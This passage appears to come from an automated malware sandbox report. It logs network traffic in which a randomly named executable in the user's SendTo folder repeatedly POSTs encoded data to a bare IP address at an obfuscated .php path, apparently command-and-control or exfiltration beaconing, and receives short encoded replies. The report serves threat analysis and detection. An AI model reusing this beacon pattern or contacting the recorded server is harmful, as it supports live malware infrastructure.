                                          Sep 13, 2024 21:04:38.649626970 CEST5680580192.168.2.431.177.108.211
                                          Sep 13, 2024 21:04:38.649760962 CEST5680580192.168.2.431.177.108.211
                                          Sep 13, 2024 21:04:38.649867058 CEST805680431.177.108.211192.168.2.4
                                          Sep 13, 2024 21:04:38.649912119 CEST5680480192.168.2.431.177.108.211
                                          Sep 13, 2024 21:04:38.654746056 CEST805680531.177.108.211192.168.2.4
                                          Sep 13, 2024 21:04:39.004472017 CEST5680580192.168.2.431.177.108.211
                                          Sep 13, 2024 21:04:39.009335995 CEST805680531.177.108.211192.168.2.4
                                          Sep 13, 2024 21:04:39.009352922 CEST805680531.177.108.211192.168.2.4
                                          Sep 13, 2024 21:04:39.009366989 CEST805680531.177.108.211192.168.2.4
                                          Sep 13, 2024 21:04:39.399868011 CEST805680531.177.108.211192.168.2.4
                                          Sep 13, 2024 21:04:39.532947063 CEST805680531.177.108.211192.168.2.4
                                          Sep 13, 2024 21:04:39.533016920 CEST5680580192.168.2.431.177.108.211
                                          Sep 13, 2024 21:04:39.655999899 CEST5680580192.168.2.431.177.108.211
                                          Sep 13, 2024 21:04:39.655999899 CEST5680680192.168.2.431.177.108.211
                                          Sep 13, 2024 21:04:39.661180019 CEST805680631.177.108.211192.168.2.4
                                          Sep 13, 2024 21:04:39.661305904 CEST5680680192.168.2.431.177.108.211
                                          Sep 13, 2024 21:04:39.661396980 CEST5680680192.168.2.431.177.108.211
                                          Sep 13, 2024 21:04:39.661675930 CEST805680531.177.108.211192.168.2.4
                                          Sep 13, 2024 21:04:39.661959887 CEST5680580192.168.2.431.177.108.211
                                          Sep 13, 2024 21:04:39.666209936 CEST805680631.177.108.211192.168.2.4
                                          Sep 13, 2024 21:04:40.020231009 CEST5680680192.168.2.431.177.108.211
                                          Sep 13, 2024 21:04:40.028531075 CEST805680631.177.108.211192.168.2.4
                                          Sep 13, 2024 21:04:40.028584003 CEST805680631.177.108.211192.168.2.4
                                          Sep 13, 2024 21:04:40.028620958 CEST805680631.177.108.211192.168.2.4
                                          Sep 13, 2024 21:04:40.412785053 CEST805680631.177.108.211192.168.2.4
                                          Sep 13, 2024 21:04:40.551362991 CEST5680680192.168.2.431.177.108.211
                                          Sep 13, 2024 21:04:40.565746069 CEST805680631.177.108.211192.168.2.4
                                          Sep 13, 2024 21:04:40.660671949 CEST5680680192.168.2.431.177.108.211
                                          Sep 13, 2024 21:04:40.689480066 CEST5680680192.168.2.431.177.108.211
                                          Sep 13, 2024 21:04:40.689661980 CEST5680780192.168.2.431.177.108.211
                                          Sep 13, 2024 21:04:40.695072889 CEST805680731.177.108.211192.168.2.4
                                          Sep 13, 2024 21:04:40.695127964 CEST805680631.177.108.211192.168.2.4
                                          Sep 13, 2024 21:04:40.695154905 CEST5680780192.168.2.431.177.108.211
                                          Sep 13, 2024 21:04:40.695302963 CEST5680780192.168.2.431.177.108.211
                                          Sep 13, 2024 21:04:40.695307016 CEST5680680192.168.2.431.177.108.211
                                          Sep 13, 2024 21:04:40.701647997 CEST805680731.177.108.211192.168.2.4
                                          Sep 13, 2024 21:04:41.051325083 CEST5680780192.168.2.431.177.108.211
                                          Sep 13, 2024 21:04:41.058347940 CEST805680731.177.108.211192.168.2.4
                                          Sep 13, 2024 21:04:41.058399916 CEST805680731.177.108.211192.168.2.4
                                          Sep 13, 2024 21:04:41.058710098 CEST805680731.177.108.211192.168.2.4
                                          Sep 13, 2024 21:04:41.437607050 CEST805680731.177.108.211192.168.2.4
                                          Sep 13, 2024 21:04:41.551249027 CEST5680780192.168.2.431.177.108.211
                                          Sep 13, 2024 21:04:41.567092896 CEST805680731.177.108.211192.168.2.4
                                          Sep 13, 2024 21:04:41.685610056 CEST5680780192.168.2.431.177.108.211
                                          Sep 13, 2024 21:04:41.686017990 CEST5680880192.168.2.431.177.108.211
                                          Sep 13, 2024 21:04:41.691210985 CEST805680731.177.108.211192.168.2.4
                                          Sep 13, 2024 21:04:41.691243887 CEST805680831.177.108.211192.168.2.4
                                          Sep 13, 2024 21:04:41.691278934 CEST5680780192.168.2.431.177.108.211
                                          Sep 13, 2024 21:04:41.691342115 CEST5680880192.168.2.431.177.108.211
                                          Sep 13, 2024 21:04:41.691427946 CEST5680880192.168.2.431.177.108.211
                                          Sep 13, 2024 21:04:41.696367025 CEST805680831.177.108.211192.168.2.4
                                          Sep 13, 2024 21:04:42.039100885 CEST5680880192.168.2.431.177.108.211
                                          Sep 13, 2024 21:04:42.044233084 CEST805680831.177.108.211192.168.2.4
                                          Sep 13, 2024 21:04:42.044289112 CEST805680831.177.108.211192.168.2.4
                                          Sep 13, 2024 21:04:42.044320107 CEST805680831.177.108.211192.168.2.4
                                          Sep 13, 2024 21:04:42.270715952 CEST5680980192.168.2.431.177.108.211
                                          Sep 13, 2024 21:04:42.271042109 CEST5680880192.168.2.431.177.108.211
                                          Sep 13, 2024 21:04:42.276101112 CEST805680931.177.108.211192.168.2.4
                                          Sep 13, 2024 21:04:42.276170969 CEST805680831.177.108.211192.168.2.4
                                          Sep 13, 2024 21:04:42.276241064 CEST5680980192.168.2.431.177.108.211
                                          Sep 13, 2024 21:04:42.276323080 CEST5680980192.168.2.431.177.108.211
                                          Sep 13, 2024 21:04:42.276329041 CEST5680880192.168.2.431.177.108.211
                                          Sep 13, 2024 21:04:42.281522036 CEST805680931.177.108.211192.168.2.4
                                          Sep 13, 2024 21:04:42.397478104 CEST5681080192.168.2.431.177.108.211
                                          Sep 13, 2024 21:04:42.402622938 CEST805681031.177.108.211192.168.2.4
                                          Sep 13, 2024 21:04:42.402683020 CEST5681080192.168.2.431.177.108.211
                                          Sep 13, 2024 21:04:42.403116941 CEST5681080192.168.2.431.177.108.211
                                          Sep 13, 2024 21:04:42.408118963 CEST805681031.177.108.211192.168.2.4
                                          Sep 13, 2024 21:04:43.056803942 CEST805680931.177.108.211192.168.2.4
                                          Sep 13, 2024 21:04:43.148972988 CEST805681031.177.108.211192.168.2.4
                                          Sep 13, 2024 21:04:43.254374027 CEST5680980192.168.2.431.177.108.211
                                          Sep 13, 2024 21:04:43.254456997 CEST5681080192.168.2.431.177.108.211
                                          Sep 13, 2024 21:04:43.423708916 CEST805680931.177.108.211192.168.2.4
                                          Sep 13, 2024 21:04:43.423774004 CEST5680980192.168.2.431.177.108.211
                                          Sep 13, 2024 21:04:43.423782110 CEST805681031.177.108.211192.168.2.4
                                          Sep 13, 2024 21:04:43.423871994 CEST5681080192.168.2.431.177.108.211
                                          Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                          Sep 13, 2024 21:02:23.590082884 CEST | 53 | 52865 | 1.1.1.1 | 192.168.2.4
                                          • 31.177.108.211
                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                          0 | 192.168.2.4 | 49734 | 31.177.108.211 | 80 | 8036 | C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          Timestamp | Bytes transferred | Direction | Data
                                          Sep 13, 2024 21:02:21.987354994 CEST | 577 | OUT | POST /lowimagebetter/VoiddbPoll/wordpressProtonDb/downloadsWindowsjavascriptBigload/temp/37localUpdate/3Temporary/Protect7Datalife/Server5db/BigloadGameProcessRequest/DleProtect4/providerMultidefaultGenerator/Better/5DatalifeVm/mariadb/sqlFlower5/requestwordpressuniversal/Image/Universal5Datalife/secureupdateprocessorgeneratordatalifeDle.php HTTP/1.1
                                          Content-Type: application/octet-stream
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                          Host: 31.177.108.211
                                          Content-Length: 344
                                          Expect: 100-continue
                                          Connection: Keep-Alive
                                          Sep 13, 2024 21:02:22.346550941 CEST | 344 | OUT | Data Raw: 00 06 04 06 06 01 04 00 05 06 02 01 02 07 01 07 00 01 05 00 02 03 03 09 03 04 0d 00 05 07 03 09 0d 0f 03 09 01 54 03 0a 0e 05 07 05 04 07 07 04 04 50 0f 08 0c 07 04 05 07 03 06 54 04 05 07 5d 00 53 0a 00 04 0e 05 05 0e 04 0c 01 0f 00 0c 54 05 04
                                          Data Ascii: TPT]ST]XU\L}Ph^vtL~YvK|hBr_clxh]pycKxYuZhmsPtw^}_~V@A{}~~Lu
                                          Sep 13, 2024 21:02:22.732584000 CEST  25  IN  HTTP/1.1 100 Continue
                                          Sep 13, 2024 21:02:22.995029926 CEST  1236  IN  HTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Fri, 13 Sep 2024 19:02:22 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          Vary: Accept-Encoding
                                          Sep 13, 2024 21:02:23.377672911 CEST  553  OUT  POST /lowimagebetter/VoiddbPoll/wordpressProtonDb/downloadsWindowsjavascriptBigload/temp/37localUpdate/3Temporary/Protect7Datalife/Server5db/BigloadGameProcessRequest/DleProtect4/providerMultidefaultGenerator/Better/5DatalifeVm/mariadb/sqlFlower5/requestwordpressuniversal/Image/Universal5Datalife/secureupdateprocessorgeneratordatalifeDle.php HTTP/1.1
                                          Content-Type: application/octet-stream
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                          Host: 31.177.108.211
                                          Content-Length: 384
                                          Expect: 100-continue
                                          Sep 13, 2024 21:02:23.637963057 CEST  25  IN  HTTP/1.1 100 Continue
                                          Sep 13, 2024 21:02:23.883778095 CEST  349  IN  HTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Fri, 13 Sep 2024 19:02:23 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          Vary: Accept-Encoding
                                          Sep 13, 2024 21:02:23.884469032 CEST  553  OUT  POST /lowimagebetter/VoiddbPoll/wordpressProtonDb/downloadsWindowsjavascriptBigload/temp/37localUpdate/3Temporary/Protect7Datalife/Server5db/BigloadGameProcessRequest/DleProtect4/providerMultidefaultGenerator/Better/5DatalifeVm/mariadb/sqlFlower5/requestwordpressuniversal/Image/Universal5Datalife/secureupdateprocessorgeneratordatalifeDle.php HTTP/1.1
                                          Content-Type: application/octet-stream
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                          Host: 31.177.108.211
                                          Content-Length: 384
                                          Expect: 100-continue
                                          Sep 13, 2024 21:02:24.125427008 CEST  25  IN  HTTP/1.1 100 Continue
                                          Sep 13, 2024 21:02:24.370389938 CEST  349  IN  HTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Fri, 13 Sep 2024 19:02:24 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          Vary: Accept-Encoding
                                          Sep 13, 2024 21:02:24.371040106 CEST  554  OUT  POST /lowimagebetter/VoiddbPoll/wordpressProtonDb/downloadsWindowsjavascriptBigload/temp/37localUpdate/3Temporary/Protect7Datalife/Server5db/BigloadGameProcessRequest/DleProtect4/providerMultidefaultGenerator/Better/5DatalifeVm/mariadb/sqlFlower5/requestwordpressuniversal/Image/Universal5Datalife/secureupdateprocessorgeneratordatalifeDle.php HTTP/1.1
                                          Content-Type: application/octet-stream
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                          Host: 31.177.108.211
                                          Content-Length: 1400
                                          Expect: 100-continue
                                          Sep 13, 2024 21:02:24.609940052 CEST  25  IN  HTTP/1.1 100 Continue
                                          Sep 13, 2024 21:02:25.050076008 CEST  349  IN  HTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Fri, 13 Sep 2024 19:02:24 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          Vary: Accept-Encoding


                                          Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
                                          1  192.168.2.4  49736  31.177.108.211  80  8036  C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          Timestamp  Bytes transferred  Direction  Data
                                          Sep 13, 2024 21:02:23.512667894 CEST  554  OUT  POST /lowimagebetter/VoiddbPoll/wordpressProtonDb/downloadsWindowsjavascriptBigload/temp/37localUpdate/3Temporary/Protect7Datalife/Server5db/BigloadGameProcessRequest/DleProtect4/providerMultidefaultGenerator/Better/5DatalifeVm/mariadb/sqlFlower5/requestwordpressuniversal/Image/Universal5Datalife/secureupdateprocessorgeneratordatalifeDle.php HTTP/1.1
                                          Content-Type: application/octet-stream
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                          Host: 31.177.108.211
                                          Content-Length: 2532
                                          Expect: 100-continue
                                          Sep 13, 2024 21:02:24.269428015 CEST  25  IN  HTTP/1.1 100 Continue
                                          Sep 13, 2024 21:02:24.404721022 CEST  200  IN  HTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Fri, 13 Sep 2024 19:02:24 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          Vary: Accept-Encoding
                                          Data Raw: 34 0d 0a 3f 56 40 5a 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: 4?V@Z0


                                          Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
                                          2  192.168.2.4  56665  31.177.108.211  80  8036  C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          Timestamp  Bytes transferred  Direction  Data
                                          Sep 13, 2024 21:02:24.606585026 CEST  554  OUT  POST /lowimagebetter/VoiddbPoll/wordpressProtonDb/downloadsWindowsjavascriptBigload/temp/37localUpdate/3Temporary/Protect7Datalife/Server5db/BigloadGameProcessRequest/DleProtect4/providerMultidefaultGenerator/Better/5DatalifeVm/mariadb/sqlFlower5/requestwordpressuniversal/Image/Universal5Datalife/secureupdateprocessorgeneratordatalifeDle.php HTTP/1.1
                                          Content-Type: application/octet-stream
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                          Host: 31.177.108.211
                                          Content-Length: 2532
                                          Expect: 100-continue
                                          Sep 13, 2024 21:02:25.376363039 CEST  25  IN  HTTP/1.1 100 Continue
                                          Sep 13, 2024 21:02:25.533644915 CEST  200  IN  HTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Fri, 13 Sep 2024 19:02:25 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          Vary: Accept-Encoding
                                          Data Raw: 34 0d 0a 3f 56 40 5a 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: 4?V@Z0


                                          Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
                                          3  192.168.2.4  56666  31.177.108.211  80  8036  C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          Timestamp  Bytes transferred  Direction  Data
                                          Sep 13, 2024 21:02:26.667722940 CEST  554  OUT  POST /lowimagebetter/VoiddbPoll/wordpressProtonDb/downloadsWindowsjavascriptBigload/temp/37localUpdate/3Temporary/Protect7Datalife/Server5db/BigloadGameProcessRequest/DleProtect4/providerMultidefaultGenerator/Better/5DatalifeVm/mariadb/sqlFlower5/requestwordpressuniversal/Image/Universal5Datalife/secureupdateprocessorgeneratordatalifeDle.php HTTP/1.1
                                          Content-Type: application/octet-stream
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                          Host: 31.177.108.211
                                          Content-Length: 2532
                                          Expect: 100-continue
                                          Sep 13, 2024 21:02:27.420001984 CEST  25  IN  HTTP/1.1 100 Continue
                                          Sep 13, 2024 21:02:27.573883057 CEST  200  IN  HTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Fri, 13 Sep 2024 19:02:27 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          Vary: Accept-Encoding
                                          Data Raw: 34 0d 0a 3f 56 40 5a 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: 4?V@Z0


                                          Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
                                          4  192.168.2.4  56667  31.177.108.211  80  8036  C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          Timestamp  Bytes transferred  Direction  Data
                                          Sep 13, 2024 21:02:27.724827051 CEST  578  OUT  POST /lowimagebetter/VoiddbPoll/wordpressProtonDb/downloadsWindowsjavascriptBigload/temp/37localUpdate/3Temporary/Protect7Datalife/Server5db/BigloadGameProcessRequest/DleProtect4/providerMultidefaultGenerator/Better/5DatalifeVm/mariadb/sqlFlower5/requestwordpressuniversal/Image/Universal5Datalife/secureupdateprocessorgeneratordatalifeDle.php HTTP/1.1
                                          Content-Type: application/octet-stream
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                          Host: 31.177.108.211
                                          Content-Length: 2532
                                          Expect: 100-continue
                                          Connection: Keep-Alive
                                          Sep 13, 2024 21:02:28.496382952 CEST  25  IN  HTTP/1.1 100 Continue
                                          Sep 13, 2024 21:02:28.627744913 CEST  200  IN  HTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Fri, 13 Sep 2024 19:02:28 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          Vary: Accept-Encoding
                                          Data Raw: 34 0d 0a 3f 56 40 5a 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: 4?V@Z0


                                          Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
                                          5  192.168.2.4  56670  31.177.108.211  80  8036  C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          Timestamp  Bytes transferred  Direction  Data
                                          Sep 13, 2024 21:02:30.074440956 CEST  578  OUT  POST /lowimagebetter/VoiddbPoll/wordpressProtonDb/downloadsWindowsjavascriptBigload/temp/37localUpdate/3Temporary/Protect7Datalife/Server5db/BigloadGameProcessRequest/DleProtect4/providerMultidefaultGenerator/Better/5DatalifeVm/mariadb/sqlFlower5/requestwordpressuniversal/Image/Universal5Datalife/secureupdateprocessorgeneratordatalifeDle.php HTTP/1.1
                                          Content-Type: application/octet-stream
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                          Host: 31.177.108.211
                                          Content-Length: 2100
                                          Expect: 100-continue
                                          Connection: Keep-Alive
                                          Sep 13, 2024 21:02:30.837603092 CEST  25  IN  HTTP/1.1 100 Continue
                                          Sep 13, 2024 21:02:31.002846956 CEST  349  IN  HTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Fri, 13 Sep 2024 19:02:30 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          Vary: Accept-Encoding


                                          Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
                                          6  192.168.2.4  56671  31.177.108.211  80  8036  C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          Timestamp  Bytes transferred  Direction  Data
                                          Sep 13, 2024 21:02:31.720515013 CEST  578  OUT  POST /lowimagebetter/VoiddbPoll/wordpressProtonDb/downloadsWindowsjavascriptBigload/temp/37localUpdate/3Temporary/Protect7Datalife/Server5db/BigloadGameProcessRequest/DleProtect4/providerMultidefaultGenerator/Better/5DatalifeVm/mariadb/sqlFlower5/requestwordpressuniversal/Image/Universal5Datalife/secureupdateprocessorgeneratordatalifeDle.php HTTP/1.1
                                          Content-Type: application/octet-stream
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                          Host: 31.177.108.211
                                          Content-Length: 2532
                                          Expect: 100-continue
                                          Connection: Keep-Alive
                                          Sep 13, 2024 21:02:32.462976933 CEST  25  IN  HTTP/1.1 100 Continue
                                          Sep 13, 2024 21:02:32.592562914 CEST  200  IN  HTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Fri, 13 Sep 2024 19:02:32 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          Vary: Accept-Encoding
                                          Data Raw: 34 0d 0a 3f 56 40 5a 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: 4?V@Z0


                                          Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
                                          7  192.168.2.4  56673  31.177.108.211  80  8036  C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          Timestamp  Bytes transferred  Direction  Data
                                          Sep 13, 2024 21:02:32.850545883 CEST  578  OUT  POST /lowimagebetter/VoiddbPoll/wordpressProtonDb/downloadsWindowsjavascriptBigload/temp/37localUpdate/3Temporary/Protect7Datalife/Server5db/BigloadGameProcessRequest/DleProtect4/providerMultidefaultGenerator/Better/5DatalifeVm/mariadb/sqlFlower5/requestwordpressuniversal/Image/Universal5Datalife/secureupdateprocessorgeneratordatalifeDle.php HTTP/1.1
                                          Content-Type: application/octet-stream
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                          Host: 31.177.108.211
                                          Content-Length: 2532
                                          Expect: 100-continue
                                          Connection: Keep-Alive
                                          Sep 13, 2024 21:02:33.604758978 CEST  25  IN  HTTP/1.1 100 Continue
                                          Sep 13, 2024 21:02:33.738260984 CEST  200  IN  HTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Fri, 13 Sep 2024 19:02:33 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          Vary: Accept-Encoding
                                          Data Raw: 34 0d 0a 3f 56 40 5a 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: 4?V@Z0
                                          Sep 13, 2024 21:02:33.953883886 CEST  200  IN  HTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Fri, 13 Sep 2024 19:02:33 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          Vary: Accept-Encoding
                                          Data Raw: 34 0d 0a 3f 56 40 5a 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: 4?V@Z0


                                          Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
                                          8  192.168.2.4  56674  31.177.108.211  80  8036  C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          Timestamp  Bytes transferred  Direction  Data
                                          Sep 13, 2024 21:02:36.064646959 CEST  578  OUT  POST /lowimagebetter/VoiddbPoll/wordpressProtonDb/downloadsWindowsjavascriptBigload/temp/37localUpdate/3Temporary/Protect7Datalife/Server5db/BigloadGameProcessRequest/DleProtect4/providerMultidefaultGenerator/Better/5DatalifeVm/mariadb/sqlFlower5/requestwordpressuniversal/Image/Universal5Datalife/secureupdateprocessorgeneratordatalifeDle.php HTTP/1.1
                                          Content-Type: application/octet-stream
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                          Host: 31.177.108.211
                                          Content-Length: 2080
                                          Expect: 100-continue
                                          Connection: Keep-Alive
                                          Sep 13, 2024 21:02:36.410722017 CEST | 2080 | OUT | Data Raw: 5e 54 43 53 55 47 5c 51 59 5f 51 51 52 51 54 55 5a 5e 5a 5f 55 57 53 40 50 58 42 5e 50 5b 51 5b 5a 5a 52 5c 59 5d 55 5f 59 5e 59 56 52 58 51 44 5b 51 5f 59 46 5a 56 52 54 5f 53 5f 5f 5b 52 5f 5e 51 41 5a 59 5e 59 57 58 59 58 58 58 57 59 5f 5b 5b
                                          Data Ascii: ^TCSUG\QY_QQRQTUZ^Z_UWS@PXB^P[Q[ZZR\Y]U_Y^YVRXQD[Q_YFZVRT_S__[R_^QAZY^YWXYXXXWY_[[_^QDT_TT]XXSTV\XFW]T\]UWYRT^YW[ZUV^\SV\ZXQXY_^[RY[VP__\R]RZ[XTY_QVU__\]Q^R_ZRX[ZX[YZ]UTZ\]XWS\^^PW]TP]:+Y2Z71" !Y*81=,%) V?<"Z'U/%,&/329[&!^-
                                          Sep 13, 2024 21:02:36.800841093 CEST | 25 | IN | HTTP/1.1 100 Continue
                                          Sep 13, 2024 21:02:36.935208082 CEST | 349 | IN | HTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Fri, 13 Sep 2024 19:02:36 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          Vary: Accept-Encoding
                                          Data Raw: 39 38 0d 0a 0d 1e 39 55 3f 08 01 1d 24 5d 37 52 2f 03 00 1a 33 3f 05 00 28 33 2d 09 2b 13 28 13 2e 2a 0b 02 30 5d 22 02 24 12 27 5b 27 3f 33 51 29 00 2e 46 0d 1d 26 05 3e 3f 24 53 29 2e 2f 01 30 58 29 59 23 09 3c 05 33 11 33 11 23 3f 39 02 37 0b 3b 1c 26 29 3d 5d 2c 35 00 5d 2a 1f 3d 00 37 1c 2e 55 0f 15 39 1b 32 32 22 51 29 32 2f 13 28 3f 36 12 31 3f 0a 0d 25 2b 24 50 27 06 00 57 24 3f 08 01 25 22 2f 5c 28 13 08 0d 21 31 39 0f 22 2b 27 54 23 00 28 56 00 33 59 54 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: 989U?$]7R/3?(3-+(.*0]"$'['?3Q).F&>?$S)./0X)Y#<33#?97;&)=],5]*=7.U922"Q)2/(?61?%+$P'W$?%"/\(!19"+'T#(V3YT0


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                          9 | 192.168.2.4 | 56675 | 31.177.108.211 | 80 | 8036 | C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          Timestamp | Bytes transferred | Direction | Data
                                          Sep 13, 2024 21:02:38.228748083 CEST | 578 | OUT | POST /lowimagebetter/VoiddbPoll/wordpressProtonDb/downloadsWindowsjavascriptBigload/temp/37localUpdate/3Temporary/Protect7Datalife/Server5db/BigloadGameProcessRequest/DleProtect4/providerMultidefaultGenerator/Better/5DatalifeVm/mariadb/sqlFlower5/requestwordpressuniversal/Image/Universal5Datalife/secureupdateprocessorgeneratordatalifeDle.php HTTP/1.1
                                          Content-Type: application/octet-stream
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                          Host: 31.177.108.211
                                          Content-Length: 2532
                                          Expect: 100-continue
                                          Connection: Keep-Alive
                                          Sep 13, 2024 21:02:38.582024097 CEST | 2532 | OUT | Data Raw: 5b 53 43 52 55 43 5c 52 59 5f 51 51 52 50 54 56 5a 5f 5a 50 55 57 53 45 50 58 42 5e 50 5b 51 5b 5a 5a 52 5c 59 5d 55 5f 59 5e 59 56 52 58 51 44 5b 51 5f 59 46 5a 56 52 54 5f 53 5f 5f 5b 52 5f 5e 51 41 5a 59 5e 59 57 58 59 58 58 58 57 59 5f 5b 5b
                                          Data Ascii: [SCRUC\RY_QQRPTVZ_ZPUWSEPXB^P[Q[ZZR\Y]U_Y^YVRXQD[Q_YFZVRT_S__[R_^QAZY^YWXYXXXWY_[[_^QDT_TT]XXSTV\XFW]T\]UWYRT^YW[ZUV^\SV\ZXQXY_^[RY[VP__\R]RZ[XTY_QVU__\]Q^R_ZRX[ZX[YZ]UTZ\]XWS\^^PW]TP]:<1 %4:)+?/>8?<&'U/&B%;19[&!^-
                                          Sep 13, 2024 21:02:38.993311882 CEST | 25 | IN | HTTP/1.1 100 Continue
                                          Sep 13, 2024 21:02:39.247961044 CEST | 200 | IN | HTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Fri, 13 Sep 2024 19:02:38 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          Vary: Accept-Encoding
                                          Data Raw: 34 0d 0a 3f 56 40 5a 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: 4?V@Z0
                                          Sep 13, 2024 21:02:39.248002052 CEST | 200 | IN | HTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Fri, 13 Sep 2024 19:02:38 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          Vary: Accept-Encoding
                                          Data Raw: 34 0d 0a 3f 56 40 5a 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: 4?V@Z0


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                          10 | 192.168.2.4 | 56676 | 31.177.108.211 | 80 | 8036 | C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          Timestamp | Bytes transferred | Direction | Data
